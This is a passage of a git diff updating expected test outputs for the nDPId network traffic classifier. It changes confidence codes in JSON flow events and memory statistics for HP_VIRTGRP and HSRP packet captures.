-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614892184461,"flow_last_seen":1614892314046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614898090218,"flow_last_seen":1614898090270,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614898090270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614894888601,"flow_last_seen":1614895277767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614898090218,"flow_last_seen":1614898324173,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614892184461,"flow_last_seen":1614892314046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":135,"packets-processed":135,"total-skipped-flows":0,"total-l4-payload-len":5105,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":64,"global_ts_msec":1614898324173} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 135/135 @@ -70,9 +70,9 @@ ~~ total active/idle flows...: 9/9 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5900298 bytes -~~ total memory freed........: 5900298 bytes -~~ total allocations/frees...: 118291/118291 +~~ total memory allocated....: 6033932 bytes +~~ total memory freed........: 6033932 bytes +~~ total allocations/frees...: 121053/121053 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 457 chars ~~ json string max len.......: 696 chars diff --git a/test/results/hsrp0.pcap.out b/test/results/hsrp0.pcap.out index 053e3bf77..c4853d1cc 100644 --- a/test/results/hsrp0.pcap.out +++ b/test/results/hsrp0.pcap.out @@ -2,20 +2,20 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"hsrp0.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1126551970888} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551970888,"flow_last_seen":1126551970888,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551970888,"l3_proto":"ip4","src_ip":"10.28.168.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1126551970888,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1126551970888,"pkt":"AQBeAAACAAAMB6wKgQAACggARcAAMAAAAAABESXiChyo\/eAAAAIHwQfBABw\/0wAAEAMKWgoAY2lzY28AAAAKHKj+"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551970888,"flow_last_seen":1126551970888,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551970888,"l3_proto":"ip4","src_ip":"10.28.168.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551970888,"flow_last_seen":1126551970888,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551970888,"l3_proto":"ip4","src_ip":"10.28.168.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.170.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1126551971000,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1126551971000,"pkt":"AQBeAAACAAAMB6wMgQAADAgARcAAMAAAAAABESPiChyq\/eAAAAIHwQfBABw50wAAEAMKWgwAY2lzY28AAAAKHKr+"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.170.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.170.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.171.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1126551971000,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1126551971000,"pkt":"AQBeAAACAAAMB6wNgQAADQgARcAAMAAAAAABESLiChyr\/eAAAAIHwQfBABw20wAAEAMKWg0AY2lzY28AAAAKHKv+"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.171.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.171.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971931,"flow_last_seen":1126551971931,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.252","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1126551971931,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1126551971931,"pkt":"AQBeAAACABJ\/uh8CgQAACggARcAAMAAAAAABESXjChyo\/OAAAAIHwQfBABxH3gAACAMKUAoAY2lzY28AAAAKHKj+"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971931,"flow_last_seen":1126551971931,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.252","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.171.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.170.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551971931,"flow_last_seen":1126551971931,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.252","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551970888,"flow_last_seen":1126551970888,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971931,"flow_last_seen":1126551971931,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.252","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.171.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.170.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551971931,"flow_last_seen":1126551971931,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.252","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551970888,"flow_last_seen":1126551970888,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":80,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":19,"global_ts_msec":1126551971931} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -25,9 +25,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872627 bytes -~~ total memory freed........: 5872627 bytes -~~ total allocations/frees...: 118126/118126 +~~ total memory allocated....: 6006261 bytes +~~ total memory freed........: 6006261 bytes +~~ total allocations/frees...: 120888/120888 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 676 chars diff --git a/test/results/hsrp2.pcap.out b/test/results/hsrp2.pcap.out index 2144638ae..e2ee0dccb 100644 --- a/test/results/hsrp2.pcap.out +++ b/test/results/hsrp2.pcap.out @@ -2,12 +2,12 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"hsrp2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643795481192} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481192,"flow_last_seen":1643795481192,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481192,"l3_proto":"ip4","src_ip":"10.52.220.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643795481192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1643795481192,"pkt":"AQBeAABmcA9q7\/W\/CABFwABQAAAAAP8R88QKNNx94AAAZgfBB8EAPOmuASgCAAUEA5hwD2rv9b8AAABaAAALuAAAJxAKNNx+AAAAAAAAAAAAAAAAAwhjaXNjbwAAAA=="} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481192,"flow_last_seen":1643795481192,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481192,"l3_proto":"ip4","src_ip":"10.52.220.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481192,"flow_last_seen":1643795481192,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481192,"l3_proto":"ip4","src_ip":"10.52.220.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481220,"flow_last_seen":1643795481220,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.253.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643795481220,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1643795481220,"pkt":"AQBeAABmAAAMn\/BnCABFwABQAAAAAP8R0sQKNP194AAAZgfBB8EAPKnLASgCAAYEAGdwD2rv9b8AAABuAAALuAAAJxAKNP1+AAAAAAAAAAAAAAAAAwhjaXNjbwAAAA=="} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481220,"flow_last_seen":1643795481220,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.253.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643795481220,"flow_last_seen":1643795481220,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.253.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643795481192,"flow_last_seen":1643795481192,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.220.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 